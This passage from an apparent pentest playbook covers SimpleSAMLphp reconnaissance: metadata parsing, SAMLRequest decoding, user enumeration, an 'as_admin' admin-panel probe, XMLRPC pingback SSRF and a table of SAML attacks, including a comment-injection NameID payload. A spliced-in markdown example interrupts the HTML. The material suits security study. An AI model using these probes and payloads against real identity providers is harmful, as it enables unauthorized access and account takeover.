&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# check for characteristic assets:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/assets/base/css/stylesheet.css&amp;#34;&lt;/span&gt; | head -5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If it&amp;#39;s SimpleSAMLphp CSS, the base path has been customized&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="analyze-saml-metadata" &gt;
&lt;div&gt;
&lt;a href="#analyze-saml-metadata"&gt;
###
&lt;/a&gt;
Analyze SAML Metadata
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;The IdP&amp;rsquo;s XML metadata contains valuable information:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;xml.etree.ElementTree&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;ET&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/saml2/idp/metadata.php&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;root &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; ET&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;fromstring(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;md&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;urn:oasis:names:tc:SAML:2.0:metadata&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;ds&amp;#39;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;http://www.w3.org/2000/09/xmldsig#&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Entity ID (unique IdP identifier)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;entity_id &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;entityID&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Entity ID: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;entity_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X.509 certificates (signing and encryption)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; key &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:KeyDescriptor&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; use &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;use&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;unspecified&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cert &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; key&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;find(&lt;span style="color:#a6d189"&gt;&amp;#39;.//ds:X509Certificate&amp;#39;&lt;/span&gt;, ns)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; cert &lt;span style="color:#99d1db;font-weight:bold"&gt;is&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;Cert (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;use&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;cert&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;40&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SingleSignOnService URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; sso &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:SingleSignOnService&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;SSO URL (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sso&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Binding&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;): &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;sso&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NameIDFormat&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; fmt &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; root&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#a6d189"&gt;&amp;#39;.//md:NameIDFormat&amp;#39;&lt;/span&gt;, ns):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;NameIDFormat: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;fmt&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Certificate Subject Alternative Names (SANs)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract using OpenSSL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;What to extract from metadata&lt;/strong&gt;:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Real Example&lt;/th&gt;
&lt;th&gt;Utility&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Entity ID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;urn:x-simplesamlphp:autenticacion-idp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Unique IdP identifier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SSO URL&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://sso.gov.ar/module.php/saml/idp/singleSignOnService&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Authentication endpoint&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Certificate&lt;/td&gt;
&lt;td&gt;Sectigo OV RSA 2048&lt;/td&gt;
&lt;td&gt;Check validity, potential XSW&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NameIDFormat&lt;/td&gt;
&lt;td&gt;&lt;code&gt;transient&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;If &lt;code&gt;persistent&lt;/code&gt; → user correlation possible&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SP Entity ID (via AuthnRequest)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;urn:www.orgao.gov.ar&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Service Provider identifier&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
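An added example, not code from the playbook, that runs the metadata extraction above offline and also exercises the SAMLRequest redirect-binding encoding (raw DEFLATE, then base64, then URL-encoding) that the next subsection decodes, from both the SP side and the decoding side. The IdP metadata, entity IDs, hosts, certificate text and AuthnRequest are all constructed for this example; only the namespace URIs, binding identifiers and NameID format are the standard SAML 2.0 values.

```python
import base64
import urllib.parse
import xml.etree.ElementTree as ET
import zlib

MD = "urn:oasis:names:tc:SAML:2.0:metadata"
DS = "http://www.w3.org/2000/09/xmldsig#"
SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
NS = {"md": MD, "ds": DS, "samlp": SAMLP, "saml": SAML}
for _prefix, _uri in NS.items():
    ET.register_namespace(_prefix, _uri)

PERSISTENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent"
SSO_LOCATION = "https://idp.example.test/module.php/saml/idp/singleSignOnService"


def build_sample_metadata():
    """Constructed IdP metadata in SAML 2.0 metadata shape; the entityID, host
    and certificate text are made up for this example."""
    root = ET.Element("{%s}EntityDescriptor" % MD, entityID="urn:x-simplesamlphp:example-idp")
    idp = ET.SubElement(root, "{%s}IDPSSODescriptor" % MD, protocolSupportEnumeration=SAMLP)
    key = ET.SubElement(idp, "{%s}KeyDescriptor" % MD, use="signing")
    data = ET.SubElement(ET.SubElement(key, "{%s}KeyInfo" % DS), "{%s}X509Data" % DS)
    ET.SubElement(data, "{%s}X509Certificate" % DS).text = "MIIC...constructed-cert..."
    ET.SubElement(idp, "{%s}NameIDFormat" % MD).text = PERSISTENT
    for binding in ("HTTP-Redirect", "HTTP-POST"):
        ET.SubElement(idp, "{%s}SingleSignOnService" % MD,
                      Binding="urn:oasis:names:tc:SAML:2.0:bindings:" + binding,
                      Location=SSO_LOCATION)
    return ET.tostring(root)


def parse_idp_metadata(xml_bytes):
    """Pull out the fields listed in the table above and attach review findings."""
    root = ET.fromstring(xml_bytes)
    certs = []
    for key in root.findall(".//md:KeyDescriptor", NS):
        cert = key.find(".//ds:X509Certificate", NS)
        certs.append((key.get("use", "unspecified"), cert.text if cert is not None else None))
    info = {
        "entity_id": root.get("entityID"),
        "certs": certs,
        "sso": {s.get("Binding").rsplit(":", 1)[1]: s.get("Location")
                for s in root.findall(".//md:SingleSignOnService", NS)},
        "name_id_formats": [f.text for f in root.findall(".//md:NameIDFormat", NS)],
        "findings": [],
    }
    if PERSISTENT in info["name_id_formats"]:
        info["findings"].append("persistent NameID: users get a stable identifier across SPs")
    if not any(use in ("signing", "unspecified") for use, _ in certs):
        info["findings"].append("no signing certificate published")
    return info


def build_sample_authn_request():
    """Constructed AuthnRequest; the SP entity ID and ACS URL are made up."""
    req = ET.Element("{%s}AuthnRequest" % SAMLP, ID="_constructed-1", Version="2.0",
                     IssueInstant="2026-01-01T00:00:00Z",
                     AssertionConsumerServiceURL="https://sp.example.test/saml/acs")
    ET.SubElement(req, "{%s}Issuer" % SAML).text = "urn:sp.example.test"
    return ET.tostring(req)


def encode_saml_request(xml_bytes):
    """HTTP-Redirect binding as an SP emits it: raw DEFLATE, base64, URL-encode."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    deflated = comp.compress(xml_bytes) + comp.flush()
    return urllib.parse.quote(base64.b64encode(deflated).decode(), safe="")


def decode_saml_request(redirect_url):
    """Inverse of the above from a full redirect URL; None when no SAMLRequest
    is present. Falls back to the uncompressed bytes if inflate fails."""
    query = urllib.parse.urlparse(redirect_url).query
    param = urllib.parse.parse_qs(query).get("SAMLRequest", [None])[0]
    if param is None:
        return None
    raw = base64.b64decode(param)
    try:
        return zlib.decompress(raw, -zlib.MAX_WBITS)
    except zlib.error:
        return raw


if __name__ == "__main__":
    info = parse_idp_metadata(build_sample_metadata())
    print(info["entity_id"], info["sso"], info["findings"])
    url = SSO_LOCATION + "?SAMLRequest=" + encode_saml_request(build_sample_authn_request())
    print(decode_saml_request(url).decode())
```

Swapping build_sample_metadata() for the bytes of a real metadata.php response gives the same dictionary, and the findings list is where a reviewer records the persistent-NameID and missing-signing-key conditions the table calls out.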
&lt;h4 id="decode-samlrequest-from-url" &gt;
&lt;div&gt;
&lt;a href="#decode-samlrequest-from-url"&gt;
###
&lt;/a&gt;
Decode SAMLRequest from URL
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When an SP redirects to the IdP, the URL contains a &lt;code&gt;SAMLRequest&lt;/code&gt; parameter (base64 + deflate):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;zlib&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;urllib.parse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract SAMLRequest from redirect URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;https://SP.TARGET.com/wp-login.php&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;loc &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;samreq &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse_qs(urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;urlparse(loc)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;query)&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;SAMLRequest&amp;#39;&lt;/span&gt;, [&lt;span style="color:#ef9f76"&gt;None&lt;/span&gt;])[&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; samreq:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; decoded &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; base64&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;b64decode(urllib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;parse&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;unquote(samreq))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# SimpleSAMLphp uses deflate compression&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; inflated &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; zlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decompress(decoded, &lt;span style="color:#99d1db;font-weight:bold"&gt;-&lt;/span&gt;zlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;MAX_WBITS)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(inflated&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; (zlib&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;error, &lt;span style="color:#e78284"&gt;UnicodeDecodeError&lt;/span&gt;):  &lt;span style="color:#737994;font-style:italic"&gt;# not deflated (POST-style payload) or not UTF-8&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(decoded&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;decode(&lt;span style="color:#a6d189"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;, errors&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;replace&amp;#39;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="user-enumeration-via-sso-login" &gt;
&lt;div&gt;
&lt;a href="#user-enumeration-via-sso-login"&gt;
###
&lt;/a&gt;
User Enumeration via SSO Login
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;Form-based SSOs often differentiate existing from non-existing users:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Identify the SSO login endpoint&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Usually: /module.php/core/loginuserpass or /simplesaml/module.php/core/loginuserpass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Test with valid vs invalid user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Different response (password error vs &amp;#34;user not found&amp;#34;) = user enum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. SimpleSAMLphp admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Access /simplesaml/module.php/core/loginuserpass.php?as_admin=1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# May give access to the SimpleSAMLphp admin panel&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="xmlrpc-blocked-by-sso--alternative-reconnaissance" &gt;
&lt;div&gt;
&lt;a href="#xmlrpc-blocked-by-sso--alternative-reconnaissance"&gt;
###
&lt;/a&gt;
XMLRPC Blocked by SSO — Alternative Reconnaissance
&lt;/div&gt;
&lt;/h4&gt;
&lt;p&gt;When a WordPress site sits behind SSO, XMLRPC may answer with HTML (the SSO login page) instead of an XML fault. Reconnaissance is still possible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods WITHOUT authentication still work:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# system.listMethods → lists all 79+ methods&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# system.getCapabilities → XMLRPC version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# demo.sayHello → connectivity test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# pingback.ping → potential SSRF (even without auth!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Methods that require auth will return SSO HTML:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# wp.getUsers, wp.getPosts, wp.uploadFile → require credentials&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="common-saml-attacks" &gt;
&lt;div&gt;
&lt;a href="#common-saml-attacks"&gt;
###
&lt;/a&gt;
Common SAML Attacks
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Attack&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Test&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;XML Signature Wrapping (XSW)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Modify Assertion while keeping Signature valid (relocate signed element)&lt;/td&gt;
&lt;td&gt;Send modified assertion with original signature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Signature Stripping&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Completely remove Signature element&lt;/td&gt;
&lt;td&gt;Does server accept unsigned assertion?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Comment Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Inject &lt;code&gt;&amp;lt;!-- comment --&amp;gt;&lt;/code&gt; in NameID&lt;/td&gt;
&lt;td&gt;&lt;code&gt;admin@target&amp;lt;!--evil--&amp;gt;@attacker.com&lt;/code&gt; → parser sees &lt;code&gt;admin@target.com&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Replay Attack&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reuse the same assertion&lt;/td&gt;
&lt;td&gt;Same token accepted twice?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key Confusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Send assertion signed by attacker IdP&lt;/td&gt;
